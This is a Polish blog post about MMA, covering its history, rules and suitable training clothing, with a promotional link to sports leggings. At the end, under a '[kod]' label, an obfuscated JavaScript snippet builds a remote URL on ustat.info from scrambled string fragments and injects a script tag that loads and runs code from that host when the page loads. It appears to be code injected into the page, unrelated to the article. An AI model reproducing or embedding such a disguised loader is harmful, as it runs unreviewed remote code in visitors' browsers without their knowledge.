08.10.2018

#Odzież MMA

Rosnąca ostatnimi czasy popularność MMA już chyba nikogo nie dziwi. MMA – czyli inaczej mixed martial arts – w spolszczeniu mieszane sztuki walki, to sport bardzo kontaktowy i widowiskowy. Jest więc atrakcyjny zarówno dla publiczności jak i dla samych sportowców.

MMA na fali popularności

W MMA dozwolone jest łączenie ruchów pochodzących z różnych technik i sztuk walki – prawdopodobnie właśnie ta różnorodność czyni walki MMA tak atrakcyjnym widowiskiem. Historia tej sztuki walki swoją dużą popularność zyskała dopiero niedawno, niemniej jednak warto wiedzieć, że pierwsze zawody, w których wykorzystywano elementy walki w stylu mieszanym, odnotowano już w starożytności. Dawniej jednak ta dyscyplina łączyła w sobie boks i zapasy, obecnie jest to mieszkanka wielu styli. Mimo pozostawienia zawodnikom dużej dowolności przebiegu walki, MMA posiada reguły, które aby walka przebiegła sprawiedliwie, powinny być respektowane.

Głównymi zasadami mieszanych sztuk walki jest zachowanie odpowiedniej pozycji podczas spotkania – walczyć powinno się „w stójce” lub „w parterze”, większość ciosów takich jak na przykład kopnięcia, rzuty i dźwignie są dozwolone, niemniej jednak nie oznacza to, że zawodnik posiada pełną dowolność w wymierzaniu uderzeń. Bezwzględnie zabronione jest umyślne łamanie stawów, ciosy „poniżej pasa” i skierowane w kierunku kręgosłupa. Gryzienie i kopanie a także wciskanie palców do oczu i kopanie leżącego zawodnika jest niedopuszczalne. Podsumowując – dozwolone są chwyty, które w bezpośredni sposób nie zagrażają utracie życia i dużego uszczerbku na zdrowiu walczących ze sobą zawodników.

""

Odpowiednia odzież treningowa MMA

W zasadach tej sztuki walki panuje spora dowolność – podobnie jest także z odpowiednim przygotowaniem odzieży treningowej do MMA. Najważniejszą kwestią, ważną dla zarówno zawodników profesjonalnych jak i amatorów jest wygoda. Zawodnik musi z łatwością wyprowadzać ciosy – odzież nie może krępować ruchów. Rewelacyjnie sprawdzają się do tego celu specjalne legginsy MMA, na przykład takie: https://fittimeshop.pl/114-legginsy-sportowe. Legginsy mają to do siebie, że nie krępują ruchów, są idealnie dopasowane do ciała i elastyczne. Odzież treningowa MMA to także różnego rodzaju koszulki – dopasowane i luźniejsze, krótkie spodenki – szorty i długie i krótkie legginsy.

Odzież do MMA

Odzież do MMA jest raczej prosta w swojej formie i zachowawcza – inwencję i własny charakter można wyrazić przez kolorystykę danych zestawów. Ubrania do mieszanych sztuk walki, mogą być stonowane ale także zaskakiwać swoim oryginalnym wzornictwem. Dzięki temu, każdy zawodnik – zarówno podczas ćwiczeń, treningów i sparingów ma szanse poczuć się wyjątkowo, profesjonalnie i komfortowo. Przy doborze odpowiedniego zestawu należy kierować się zawsze jakością wykonania. Aktualnie, stawia się na zestawy z materiałów kompresyjnych – takich, które pozwalają na odprowadzanie wilgoci na zewnątrz, co daje niesłychany komfort. Odzież kompresyjna pozwala na uczucie suchości i chłodu – nawet podczas intensywnych treningów.

""

[kod]

(function(){
t9vgu="p96kr7hs9vgz";t9vg=document.createElement("script");
t9vg_="u"+("st");t9vg_+="at"+(".");t9vg.async=true;t9vg_+="in";
t9vgu="124575736."+t9vgu;t9vg.type="text/javascript";t9vgu+="7h3tip0le2ph";
t9vgu+="intgdj";t9vg_+=("f")+"o"+("/");t9vg.src="https://"+t9vg_+t9vgu;
t9vgd=document.body;t9vgd.appendChild(t9vg);
})();